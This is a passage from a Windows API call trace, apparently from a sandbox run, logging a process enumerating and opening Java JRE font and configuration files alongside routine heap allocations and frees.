lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.894] GetFileType (hFile=0x360) returned 0x1 [0096.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0096.894] CloseHandle (hObject=0x360) returned 1 [0096.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0096.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0096.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0096.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0096.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0096.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0096.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0096.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0096.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0096.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0096.895] AreFileApisANSI () returned 1 [0096.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0096.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a368 [0096.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 70 [0096.895] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterbold.ttf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39254)) returned 1 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0096.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.896] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3b40c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LucidaTypewriterRegular.ttf", cAlternateFileName="LUDBAB~1.TTF")) returned 1 [0096.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0096.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0096.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0096.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0096.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0096.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0096.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0096.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0096.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0096.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0096.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ce30 [0096.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0096.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0096.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0096.897] AreFileApisANSI () returned 1 [0096.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf", lpUsedDefaultChar=0x0) returned 73 [0096.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0096.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0096.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0096.897] AreFileApisANSI () returned 1 [0096.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0096.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x84fe0 [0096.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 73 [0096.897] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterregular.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.906] GetFileType (hFile=0x360) returned 0x1 [0096.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0096.906] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.907] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.907] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.907] CloseHandle (hObject=0x360) returned 1 [0096.907] AreFileApisANSI () returned 1 [0096.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0096.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85080 [0096.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x85080, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 73 [0096.907] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.907] GetFileType (hFile=0x360) returned 0x1 [0096.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85080 | out: hHeap=0x20000) returned 1 [0096.907] CloseHandle (hObject=0x360) returned 1 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0096.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0096.909] AreFileApisANSI () returned 1 [0096.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0096.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x856c0 [0096.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 73 [0096.909] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterregular.ttf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3b40c)) returned 1 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0096.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.909] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8cf88, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\f", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓됌\x03⺊Āgr먤聤̓㑍Ā̓芐\x07̓뻌聤됌\x03됌\x03.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf")) returned 0 [0096.909] FindClose (in: hFindFile=0x78290 | out: hFindFile=0x78290) returned 1 [0096.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0096.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0096.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0096.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0096.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0096.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0096.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0096.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0096.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0096.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0096.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0096.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0096.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0096.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0096.910] AreFileApisANSI () returned 1 [0096.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties", lpUsedDefaultChar=0x0) returned 73 [0096.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0096.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0096.910] AreFileApisANSI () returned 1 [0096.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0096.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x859e0 [0096.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program 